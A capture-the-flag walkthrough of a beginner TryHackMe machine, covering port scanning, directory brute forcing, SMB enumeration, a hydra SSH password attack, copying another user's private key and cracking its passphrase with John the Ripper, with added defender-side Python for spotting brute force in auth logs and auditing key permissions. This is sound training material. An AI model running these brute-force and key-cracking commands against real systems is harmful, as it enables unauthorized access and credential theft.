Description from THM
This is a machine that allows you to practice web app hacking and privilege escalation.
This is a beginner friendly room on TryHackMe. There are several tasks in this CTF that need to be completed, and I'll answer them along the way. The purpose of this machine is to learn brute forcing, hash cracking, service enumeration, and Linux enumeration.
Tools
- Nmap
- gobuster
- enum4linux
- ssh2john
- John the Ripper
Task 1
This task is to just deploy the machine and connect to the THM network.
Task 2
The first thing we're going to do is run an Nmap scan of the target machine to find what services are running on it.
nmap -sC -sV -oA basic 10.10.195.240
Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-12 04:57 GMT
Nmap scan report for ip-10-10-195-240.eu-west-1.compute.internal (10.10.195.240)
Host is up (0.0015s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
MAC Address: 02:37:12:F3:96:43 (Unknown)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are several open ports:
- Port 22 - SSH
- Port 80 - HTTP (Apache httpd 2.4.18)
- Port 139 & 445 - SMB
- Port 8009 - ajp13 (Apache Jserv)
- Port 8080 - HTTP (Apache Tomcat)
They are all pretty interesting, but for now let's focus on the web service on port 80 and see what we can find.
Task 3
For this task, we'll need to find the hidden directory on the web server.
If we try to go to the webpage, all we see is a message that says "Undergoing maintenance":
To find the hidden directories, we'll use a tool called gobuster. It is used to look for directories and files on a website using brute force.
To use gobuster, I'm going to run the following command:
gobuster dir -u http://<ip>:80 -w /usr/share/wordlists/dirb/common.txt
- gobuster - starts the tool
- dir - used to bruteforce directory/files
- -u - the target URL
- -w - path to the wordlist
gobuster dir -u http://10.10.195.240:80 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.195.240:80
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2022/03/12 05:24:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2022/03/12 05:24:34 Finished
===============================================================
All the directories besides /development and /index.html are forbidden (Status: 403 means that it is forbidden). index.html is just the main page we saw that said "Undergoing maintenance". This leaves us with /development to explore.
As we can see, there are two text files on the page. If we click on dev.txt we get what looks to be some developer's notes. It seems two people are communicating with each other using this text file, someone with the initials K and J:
On further inspection, the person with the initial "K" was messing around with Struts and mentions that they are using version 2.5.12. If we google Struts 2.5.12, the first result is an exploit from Exploit-DB. It is called:
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
We'll keep this in mind, because it is useful information. Now, let's check the other text file, j.txt:
It's a message from "K" to "J", telling them to fix the weak credentials in the /etc/shadow file.
Tasks 4-7
We've discovered quite a bit by enumerating the web server, but let's continue. We still need to enumerate SMB (Samba).
A tool that we can use to enumerate SMB is enum4linux. It is used to enumerate data from Windows and Samba hosts. We can use the following command:
enum4linux <machine ip>
After we run enum4linux, we can go through it and see what we can find that is useful.
We found two users, kay and jan. This explains the "K" and "J" in the text files earlier. Now we need to figure out the passwords of the two users we found. Let's use hydra to brute force a user's password with a dictionary attack.
Also, recall from earlier that Kay told Jan that their password is weak. So we can assume that Jan has a weak password that we can hopefully find using hydra.
We'll use the following command (it will take a bit to complete):
hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.195.240
- hydra - starts the tool
- -t - sets the number of parallel tasks (4 in the command above)
- -l - sets user (in this case jan)
- -P - path to wordlist
- ssh:// - remember from the nmap scan the target is running ssh. So, this will brute force the ssh login.
[22][ssh] host: 10.10.195.240 login: jan password: <password here>
I've omitted the password because I believe in attempting it yourself. If you've done the enumerating and scans correctly you should get the same results.
We have the password, so let's try logging in with SSH using our newly found credentials.
We will use the following command to login:
ssh jan@<ip>
jan@basic2:~$ whoami
jan
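The brute force above leaves a very visible trail in the target's sshd logs. As an added defender-side example (not part of the original writeup), here is a small Python detector over constructed auth.log lines in Ubuntu's sshd format: it flags any source that piles up failed passwords and, more importantly, a later accepted login from that same source, which is exactly the hydra-then-ssh sequence shown here. The hostname, source IPs and PIDs in the sample are made up.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/auth.log lines (not taken from the machine).
# Five failed passwords for jan from one source, then a successful login from it.
SAMPLE_AUTH_LOG = """\
Mar 12 05:40:01 basic2 sshd[2301]: Failed password for jan from 10.10.14.5 port 51234 ssh2
Mar 12 05:40:01 basic2 sshd[2302]: Failed password for jan from 10.10.14.5 port 51235 ssh2
Mar 12 05:40:02 basic2 sshd[2303]: Failed password for jan from 10.10.14.5 port 51236 ssh2
Mar 12 05:40:02 basic2 sshd[2304]: Failed password for jan from 10.10.14.5 port 51237 ssh2
Mar 12 05:40:03 basic2 sshd[2305]: Failed password for jan from 10.10.14.5 port 51238 ssh2
Mar 12 05:40:09 basic2 sshd[2310]: Accepted password for jan from 10.10.14.5 port 51244 ssh2
Mar 12 05:45:00 basic2 sshd[2400]: Failed password for kay from 10.10.14.9 port 40001 ssh2
Mar 12 05:50:00 basic2 sshd[2410]: Accepted publickey for kay from 10.10.14.9 port 40002 ssh2
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port")

def analyze_auth_log(text, threshold=5):
    """Return (sources over threshold, logins that followed a burst, users tried per source).

    Lines are processed in order. A source that accumulates `threshold` failures is
    reported, and any later accepted login from that same source is reported as a
    likely successful brute force (the hydra followed by `ssh jan@...` pattern).
    """
    failures = defaultdict(int)      # source ip -> failed password attempts
    targets = defaultdict(set)       # source ip -> usernames it tried
    suspicious_sources = set()
    compromised = []                 # (user, auth method, source) after a burst
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, src = m.groups()
            failures[src] += 1
            targets[src].add(user)
            if failures[src] >= threshold:
                suspicious_sources.add(src)
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            method, user, src = m.groups()
            if src in suspicious_sources:
                compromised.append((user, method, src))
    return sorted(suspicious_sources), compromised, {s: sorted(u) for s, u in targets.items()}

if __name__ == "__main__":
    srcs, comp, tried = analyze_auth_log(SAMPLE_AUTH_LOG)
    print("brute-force sources:", srcs, "| logins after a burst:", comp, "| users tried:", tried)
```

The same lines are what fail2ban or a SIEM rule would key on; the threshold and window are the tuning knobs, and hydra's -t setting only changes how fast the burst arrives.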
Tasks 8-11
We'll need to further enumerate the machine to find any vectors for privilege escalation.
Let's look around and see what we can find.
jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
Kay's files look promising! Let's continue to look through.
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
Looking in the .ssh folder we can see Kay's SSH key pair. We can copy the private key (id_rsa) and attempt to crack its passphrase using John the Ripper; however, we'll need to use ssh2john first. This is because we need to convert the id_rsa file into a hash format that john can work with.
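The real weakness here is not the key itself but that another local user (jan) can read it. As an added example, not from the original writeup, this Python audit walks home directories for private keys readable through a permissive .ssh directory, reports whether a PEM key is at least passphrase-protected (an encrypted key can still be attacked offline, as the next steps show), and includes a remediation helper. The fixture it builds is constructed to mirror the listing above (kay/.ssh is drwxr-xr-x); the id_rsa mode of 644 and the placeholder key contents are assumptions.

```python
import os
import stat
import tempfile

READ_BY_OTHERS = stat.S_IRGRP | stat.S_IROTH
OPEN_DIR = READ_BY_OTHERS | stat.S_IXGRP | stat.S_IXOTH

def audit_ssh_keys(home_root):
    """Report private keys under <home_root>/<user>/.ssh that other local users can read.
    Returns (path, mode, encrypted) tuples; a key counts as exposed only when both the
    .ssh directory and the key file grant group/other access. `encrypted` is True/False
    for PEM keys (Proc-Type header) and None for new-format OPENSSH keys (not parsed)."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        ssh_dir = os.path.join(home_root, user, ".ssh")
        if not os.path.isdir(ssh_dir):
            continue
        dir_mode = stat.S_IMODE(os.stat(ssh_dir).st_mode)
        for name in sorted(os.listdir(ssh_dir)):
            if not name.startswith("id_") or name.endswith(".pub"):
                continue   # only private keys (id_rsa, id_ed25519, ...)
            path = os.path.join(ssh_dir, name)
            key_mode = stat.S_IMODE(os.stat(path).st_mode)
            if not (dir_mode & OPEN_DIR and key_mode & READ_BY_OTHERS):
                continue
            with open(path, "rb") as f:
                head = f.read(256)
            encrypted = None if b"BEGIN OPENSSH PRIVATE KEY" in head else b"ENCRYPTED" in head
            findings.append((path, oct(key_mode), encrypted))
    return findings

def harden_key(path):
    """Remediation: owner-only key file and owner-only .ssh directory."""
    os.chmod(path, 0o600)
    os.chmod(os.path.dirname(path), 0o700)

def build_demo_home():
    """Constructed fixture (not the real machine) mirroring the page's listing:
    kay/.ssh is drwxr-xr-x and id_rsa is world-readable; jan has no keys."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "jan"))
    kay_ssh = os.path.join(root, "kay", ".ssh")
    os.makedirs(kay_ssh)
    os.chmod(kay_ssh, 0o755)
    key = os.path.join(kay_ssh, "id_rsa")
    with open(key, "w") as f:   # placeholder PEM body, not real key material
        f.write("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                "DEK-Info: AES-128-CBC,00\n\nPLACEHOLDER\n-----END RSA PRIVATE KEY-----\n")
    os.chmod(key, 0o644)
    return root
```

Run audit_ssh_keys("/home") on a real host to get the list; harden_key applies the 600/700 layout sshd itself insists on for its own use.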
We'll use the following command to convert id_rsa to hash format (my file location may be different from yours. I'm using the THM AttackBox for this, so it might be different on Kali or you'll need to install it):
python3 /opt/john/ssh2john.py id_rsa > id_rsa.hash
Now we can run john:
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
<password here> (id_rsa)
1g 0:00:00:09 DONE (2022-03-12 06:51) 0.1086g/s 1558Kp/s 1558Kc/s
Session completed.
We have the passphrase for Kay's key! Let's log in as Kay now.
jan@basic2:/home/kay/.ssh$ ssh -i id_rsa kay@10.10.195.240
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.195.240 (10.10.195.240)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key 'id_rsa':
Where it says Enter passphrase, we'll enter the one we just found for Kay. After doing so, we have access as Kay.
kay@basic2:~$ whoami
kay
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
<final password here>
We're done! We found the final password!
Summary
After solving this TryHackMe machine we learned how to scan our target machine to look for any services that were running on it. We used what we found to enumerate the web server, SMB, and SSH. We got a chance to use brute forcing tools to continue enumerating the target machine. The vulnerability we discovered was the outdated Apache Struts; we didn't end up dealing with that, but it was a cool find. We also discovered text files that weren't for our eyes to see. Then, we dealt with weak passwords, which gave us a chance to practice password cracking. In the end, using the information we found, we were able to escalate our privileges.